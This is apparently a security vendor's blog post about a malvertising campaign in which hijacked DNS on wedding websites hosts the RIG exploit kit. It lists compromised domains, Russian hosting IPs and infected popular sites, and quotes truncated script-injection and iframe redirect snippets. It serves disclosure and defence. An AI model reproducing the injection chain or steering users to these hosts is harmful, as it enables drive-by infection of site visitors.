wedding22

 

Specifically, here are some of the wedding websites used in this campaign:

  • amandabrandon.net
  • amberandrew.net
  • angelajacob.com
  • angiecesar.com
  • arnetriawyatt.com
  • ashleyandjames.net
  • caitlinbrad.com
  • carolinaandjeremy.com
  • christineandlucas.com
  • colelauren.com
  • danikastephen.com
  • drgillianmcknight.com
  • forbetterorforgetit.com
  • gillianmcknight.net
  • jazzdish.com
  • jenniferronn.com
  • jessicaandclayton.com
  • jodimichael.net
  • kaitlynsammy.com
  • karimitch.com
  • kassidymichael.com
  • kassiray.com
  • katiejustin.com
  • kristinechris.com
  • sharithenotary.com

All of these websites were created by Rob Cross, a wedding videographer.

robcross1

 

This attack campaign started on September 28 and is still ongoing as of the time of posting this blog. It works as follows:

1) A popular website is infected to redirect to a another site via Javascript 
2) Second site is redirecting to the malicious payload destination via IFRAME
3) The malicious payload destination is hosted on the Russian IP which the hijacked DNS entry of the wedding web sites points to

This method saves the attacker from registering new domains.

For example: 

 START  www.sidar.org [do not visit ]
 REDIRECT  myname.pdhi-online.org
 EK  key.karimitch.com/?xXqKd7Cxxxxxxxxy

 

In this case, sidar.org is the popular website that is injected with a SCRIPT and the user is redirected.

     <script type="text/javascript" src="http://myname.pdhi-online..>

The redirection to malicious EK landing page is achieved via IFRAME on the pdhi-online.org site.

     <iframe src="http://key.KARIMITCH.COM/..>

Karimitch.com is a wedding website which DNS has been exploited. 

The hosting IP addresses for the EK sites are all hosted in Russia:

  • 109.234.34.247  (Moscow, McHost.RU)
  • 193.124.117.105 (Moscow, MTW)
  • 5.200.35.126 (St Petersburg, IT Grad)
  • 212.116.121.122 (St Petersburg, IT Grad)

All of these sites are hosting the RIG exploit kit. RIG became the most popular exploit kit used in the wild since the demise of Angler. See Cyphort webinar on the rise and fall of Angler

Here are the screenshots of the encrypted and decrypted versions of RIG scripts.

rig_1
RIG Exploit script – encrypted

 

rig_2
RIG Exploit script – decrypted

Over 2 million people are potentially at risk, as they visit the sites infected in this campaign. Here is the list of the infected sites, together with estimated monthly visits per SimilarWeb :

AVOID VISITING THESE WEBSITES

363,000 – www.doentesporfutebol.com.br
327,000 – www.dicasdetreino.com.br
266,000 – www.agilemind.com
260,000 – www.sexchan.info
197,000 – www.fulanax.com
180,000 – www.thehollywoodnews.com
161,000 – www.newshub.org
82,000 – www.xorbin.com
69,000 – www.quran-o-sunnat.com
54,000 – www.turboincomesecret.com
43,000 – www.masterbundles.com
40,000 – www.mubs.ac.ug
39,000 – www.mountainsmith.com
31,000 – www.a2zwebhelp.com
22,000 – www.modeltheme.com
21,000 – www.titanicthemes.com
20,000 – www.1stonlinesolutions.com
12,000 – www.vagtune.in

Over 5,000 weddings take place every day in the United States. According to Quora, a custom wedding website could cost as high as $2,000 dollars.  It is important to remember to secure your wedding website and its DNS properly so it is not abused by cybercriminals.